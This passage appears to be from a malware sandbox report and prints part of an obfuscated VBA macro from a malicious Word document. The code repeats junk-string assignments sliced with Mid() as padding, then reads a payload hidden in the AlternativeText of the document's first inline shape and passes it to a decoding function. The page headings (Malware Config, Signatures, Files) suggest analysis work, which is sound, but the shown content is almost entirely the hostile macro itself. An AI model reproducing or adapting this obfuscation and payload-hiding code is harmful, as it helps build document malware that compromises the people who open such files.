+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

309

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

310

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

311

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

312

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

313

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

314

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

315

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

316

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

317

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

318

OOijpW = Mid(BnbGuGVJS, 1, 1)

319

pQfRfj = Mid(BnbGuGVJS, 286, 1)

320

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

321

jpOSVN = Mid(BnbGuGVJS, 172, 1)

322

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

323

Rp6apacafzo_ = Hkuh37ff65vihiqh1z.InlineShapes.Application.ActiveDocument.InlineShapes().Item(1).AlternativeText

324

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

325

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

326

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

327

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

328

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

329

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

330

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

331

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

332

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

333

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

334

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

335

OOijpW = Mid(BnbGuGVJS, 1, 1)

336

pQfRfj = Mid(BnbGuGVJS, 286, 1)

337

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

338

jpOSVN = Mid(BnbGuGVJS, 172, 1)

339

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

340

X0uqsty6g04n0l = Trim(Bm1urvrrjwck_j(Rp6apacafzo_))

341

BnbGuGVJS = " 1M7L7DHMRVWZQ1TLKJSDT8BNh H6N2HL1Y0OQ97SPFKB4YW495KRJK86KX202VVRYMHGBWKOSPL2GN" _

342

+ "LuqAICDW2664JFV47G92MBMIT12DKLY8BA8TGEK468B0DW016URH0C3YJ9TO22EAXEXL1VUHSW7KH9UY9Y6PI8A52ICM" _

343

+ "jRhqQBhsD9EJKYG9PTSFP6LYVR4RVHEEULFAJCAT6IWLVR1JR6190N1CDU70UBVNL95PV083O2EM259698A7V87J6KLgQYI43KDU1F dOF9KMS615NdO6GR4J2IL43N7AS2C8W3jSV6wL8KXUSURL"

344

YrnScuQN = Mid(BnbGuGVJS, 263, 1)

345

NCaUFDcPwj = Mid(BnbGuGVJS, 174, 2)

346

ULKiimLwvrT = Mid(BnbGuGVJS, 27, 1)

347

FLzQCnriXm = Mid(BnbGuGVJS, 81, 2)

348

EXbzRwE = Mid(BnbGuGVJS, 311, 1)

349

XbIuPdBS = Mid(BnbGuGVJS, 274, 2)

350

jkjzsiz = Mid(BnbGuGVJS, 26, 1)

351

JPwYuNZPjzi = Mid(BnbGuGVJS, 307, 1)

352

OOijpW = Mid(BnbGuGVJS, 1, 1)

353

pQfRfj = Mid(BnbGuGVJS, 286, 1)

354

jUSALRJa = Mid(BnbGuGVJS, 178, 2)

355

jpOSVN = Mid(BnbGuGVJS, 172, 1)

356

WRQIpdJ = YrnScuQN + NCaUFDcPwj + ULKiimLwvrT + FLzQCnriXm

357

End Function

358

359

Sharing

General

Malware Config

Signatures

Files

Hkuh37ff65vihiqh1z

V498mqcl653i20qsx6

We care about your privacy.